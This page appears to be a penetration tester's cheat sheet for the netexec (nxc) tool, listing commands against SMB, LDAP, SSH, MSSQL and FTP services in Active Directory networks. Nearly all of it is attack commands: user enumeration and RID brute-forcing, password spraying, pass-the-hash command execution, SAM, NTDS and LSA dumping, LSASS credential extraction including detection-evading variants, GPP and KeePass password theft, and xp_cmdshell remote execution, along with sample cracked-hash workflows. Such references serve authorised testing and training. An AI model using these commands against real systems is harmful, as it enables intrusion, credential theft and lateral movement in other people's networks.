netexec

Last updated 16 hours ago

Was this helpful?

netexec

(nxc) is a network service exploitation tool that helps automate assessing the security of large networks. An amazing tool that makes enumerating and exploiting Active Directory (AD) environments exponentially more efficient! You can view its usage in almost any of the .

SMB

Enumeration

Enumerate domain/local users:

# List domain users
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --users
# List local users
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --users --local-auth

# Create a users list from nxc's output
$ nxc smb <target> -u <user> -p <pass> --users | awk '$1 == "SMB" && $5 != "[+]" && $5 != "-Username-" && $5 != "[*]" {print $5}' > domain_users

Domain users can be also be enumerated via a RID-bruteforcing attack:

# Brute-force RIDs (default up to 4000)
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --rid-brute <max-rid>
# Create a users list from nxc's output
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --rid-brute <max-rid> > nxc_users
cat nxc_users | awk '{print $6}' | awk -F'\' '{print $2}' > domain_users

Enumerate domain/local hosts:

# List domain hosts
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --computers
# List local hosts
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --computers --local-auth

# List SMB shares
nxc smb <TARGET-IP> --shares
# List SMB shares via a NULL session
nxc smb <TARGET-IP> -p '' -u '' --shares
# List SMB shares via a guest session
nxc smb <TARGET-IP> -p 'guest' -u '' --shares
# List SMB shares via an anonymous session
nxc smb <TARGET-IP> -p 'anonymous' -u '' --shares

# List domain groups
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --groups --local-groups 
# List local groups
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --local-groups

# List active sessions
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --sessions
# List logged on users
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --loggedon-users

# List the domain's password policy
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --pass-pol

Password Spray

$ nxc smb <target> -u <user> -p <pass> -d <domain> --continue-on-success

If the results include the domain , e.g. (seruca.yzx) → a domain account.

...
SMB 192.168.X.97  445 DC01   [+] secura.yzx\bob:Pass123!

If it has (Pw3d!) at the end → Local Administrator account.

...
SMB 192.168.X.95 445 SECURE [+] secura.yzx\bob:Pass123! (Pwn3d!)

RCE

nxc smb <target> -u <user> --H <hash> -X <command>

Spidering

nxc smb <ip> -u <user> -p <pass> --spider <share> --pattern txt

nxc smb <ip> -u <user> -p <pass> --spider <share> --content --regex Encrypt

nxc smb <ip> -u <user> -p <pass> --spider <share> --regex . --depth 1

Upload/Download

If large files are failing/erroring, add --smb-timeout with a value than 2.

nxc smb <ip> -u <user> -p <pass> --share <share>  --get-file <file1> <file2>

nxc smb <ip> -u <user> -p <pass> --share <share>  --put-file <file1> <file2>

Modules

asdas

# SAM
nxc smb <ip> -u <user> -p <pass> --sam

# NTDS
nxc smb <ip> -u <user> -p <pass> --ntds --user <user>

# LSA
nxc smb <ip> -u <user> -p <pass> --lsa

The hash format that starts with $DCC2$ (derived from --lsa) is stronger than NTLM and cannot be used for a PtH attack. For attempting to crack them, the domain and username needs to be removed; only the value starting with $DCC2$ is required.

# Convert DCC2 hashes
$ cat MS01_10.129.204.133_2022-11-08_093944.cached| cut -d ":" -f 2
$DCC2$10240#julio#c2139497f24725b345aa1e23352481f3
$DCC2$10240#david#a8338587a1c6ee53624372572e39b93f
$DCC2$10240#john#fbdeac2c1d121818f75796cedd0caf0a

# Crack hashes
hashcat -m2100 hashes.txt /usr/share/wordlists/rockyou.txt

Enumerate network interfaces:

# Via WMI
nxc smb <ip> -u <user> -p <pass> -M get_netconnections

# Via RPC
nxc smb <ip> -u <user> -p <pass> -M ioxidresolver

Locate the configuration file:

nxc smb <ip> -u <user> -p <pass> -M keepass_discover

Check for credentials:

nxc smb <ip> -u <user> -p <pass> -M keepass_trigger -o ACTION=ALL KEEPASS_CONFIG_PATH=C:/Users/julio/AppData/Roaming/KeePass/KeePass.config.xml

Check /tmp/export.xml after.

Retrieve the plaintext password for accounts pushed through GPPs:

nxc smb <ip> -u <user> -p <pass> -M gpp_password

Search for registry.xml files for autologin information:

nxc smb <ip> -u <user> -p <pass> -M gpp_autologin

Enable RDP:

nxc smb <ip> -u <user> -p <pass> -M rdp -o ACTION=enable

Python-based, uses impacket to read the LSASS dump and pypykatz to extract credentials:

nxc smb <ip> -u <user> -p <pass> -M lsassy

Uses the Sysinternals procdump to create the LSASS dump and pypykatz to extract credentials:

nxc smb <ip> -u <user> -p <pass> -M procdump

Uses clone handles to create an obfuscated dump:

nxc smb <ip> -u <user> -p <pass> -M handlekatz

Opening a handle to LSASS can be detected, so it searches for existing handles, and if one is found, it copies it and creates a LSASS minidump:

nxc smb <ip> -u <user> -p <pass> -M nanodump

LDAP

nxc ldap dc01.rebound.htb -u <user> -p <pass> -k --gmsa

nxc ldap <target> -u <user> -p <pass> -M whoami -o USER=<user>

nxc ldap <target> -u <user> -p <pass> -M get-network -o ALL=true

nxc ldap <ip> -u <user> -p <pass> -M laps

nxc ldap <ip> -u <user> -p <pass> -M daclread -o TARGET=<user> ACTION=read

# DCSync rights
nxc ldap <ip> -u <user> -p <pass> -M daclread -o TARGET_DN="DC=inlanefreight,DC=htb" ACTION=read RIGHTS=DCSync

SSH

# Password authentication
nxc ssh <target> -u <user> -p <pass>

# Key authentication
nxc ssh <target> -u <user> -p '' --key-file root_id_rsa

# Port specification
nxc ssh <target> -u <user> -p <pass> --port 2222

nxc ssh <target> -u userfile -p passwordfile --no-bruteforce --continue-on-success

nxc ssh <target> -u <user> -p <pass> -x <command>

# Upload
nxc ssh <target> -u <user> -p <pass> --put-file file.txt /tmp/file.txt

# Download
nxc ssh <target> -u <user> -p <pass> --get-file /tmp/file.txt file.txt

MSSQL

Two methods can be used to authenticate to MSSQL: Windows (default) & local auth:

# 1. Windows auth

# With SMB port open
nxc mssql <target> -u <user> -p <pass>

# With SMB port closed
nxc mssql <target> -u <user> -p <pass> -d <domain>

# 2. Local auth
nxc mssql <target> -u <user> -p <pass> --local-auth

Ports can be also be specified:

nxc mssql <target> -u <user> -p <pass> --port <port>

nxc mssql <target> -u userfile -p passwordfile --no-bruteforce --continue-on-success

From standard user to DBA:

# Check if possible
nxc mssql <ip> -u user -p password -M mssql_priv

# Impersonate
nxc mssql <ip> -u user -p password -M mssql_priv -o ACTION=privesc

# Rollback
nxc mssql <ip> -u user -p password -M mssql_priv -o ACTION=rollback

# Remote queries
nxc mssql <target> -u <user> -p <pass> --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'

# System RCE via xp_cmdshell
nxc mssql <target> -u <user> -p <pass> --local-auth -x whoami

# Upload
nxc mssql <target> -u <user> -p <pass> --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt

# Download
nxc mssql <target> -u <user> -p <pass> --get-file C:\\Windows\\Temp\\whoami.txt /tmp/file

nxc mssql <target> -u <users> -p <pass> --rid-brute

FTP

nxc ftp <target> -u userfile -p passwordfile --no-bruteforce --continue-on-success

# List root directory
nxc ftp <target> -u <user> -p <pass> --ls

# List a specific directory
nxc ftp <target> -u <user> -p <pass> --ls <dir>

# Download
nxc ftp <target> -u <user> -p <pass> --get <file>

# Upload
nxc ftp <target> -u <user> -p <pass> --put <local-file> <remote-file>

Resources

PreviousActive Directory Nextimpacket